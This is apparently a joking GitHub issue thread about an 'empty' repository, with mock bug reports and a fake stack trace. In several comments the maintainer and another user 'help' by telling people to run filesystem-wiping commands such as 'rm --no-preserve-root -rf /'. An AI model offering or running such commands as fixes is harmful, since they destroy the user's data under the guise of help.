### ISSUE TITLE
repository is empty

### ISSUE THREAD

**Issue by ansuz** [jeffluo35/hpms#1]

**Comment by cjdelisle** [comment]
To repeat:
Open https://github.com/jeffluo35/hpms in your browser
Observe it says "This repository is empty."
(tested on Mac Chrome)

**Comment by dansup** [comment]
@jeffluo35 @ansuz @cjdelisle Can confirm. My browser shows an empty repo.

**Comment by cjdelisle** [comment]
It might be a good idea to add a unit test when this issue is fixed, possibly using phantomjs and travis-ci.

**Comment by ansuz** [comment]
Here's a stack trace:

```
Error: empty repository
    at f (repl:1:41)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
    at f (repl:1:80)
```

Hopefully that helps.

**Comment by jeffluo35** [comment]
"It's not a bug, it's a feature"

**Comment by ansuz** [comment]
could you make this feature configurable from the command line? It's interfering with my workflow.

**Comment by ansuz** [comment]
Oh, I see you applied a patch with breaking changes to the API. How do I invoke the previous behaviour?

**Comment by jeffluo35** [comment]
rm -rf *

**Comment by ansuz** [comment]
not working for me. Do you need another stack trace?

**Comment by jeffluo35** [comment]
You could also try this:
# rm --no-preserve-root -rf /

**Comment by ansuz** [comment]
I ran this on a friend's server and it became unresponsive.

Does this software have a License? I'm particularly interested in any clauses about liability.

**Comment by cjdelisle** [comment]
that's weird, I typed it in too but for me it just redirected to a google search, this is the URL: https://www.google.com/search?q=rm+--no-preserve-root+-rf+%2F

**Comment by jeffluo35** [comment]
Sorry about the missing license. Apparently someone ran that command on the server that was hosting this repository, which restored original functionality.

**Comment by jeffluo35** [comment]
@ansuz That command also has the functionality of restoring the original functionality of your whole computer.

**Comment by ansuz** [comment]
hmmm. that should probably be documented.

**Comment by jeffluo35** [comment]
You are welcome to add that to the wiki.

**Comment by ansuz** [comment]
https://github.com/jeffluo35/hpms/wiki

**Comment by io4** [comment]
I am sorry you are not informed, but your changes of adding content is killing kittens, to undo your terrible damage, you need to execute sudo rm -rf --no-preserve-root --fix-kittens /

**Comment by jeffluo35** [comment]
"You are welcome to make a pull request with your specified changes."

**Comment by jeffluo35** [comment]
Please open a new issue instead of adding to this thread. Thank you.

**Comment by kpcyrd** [comment]
+1
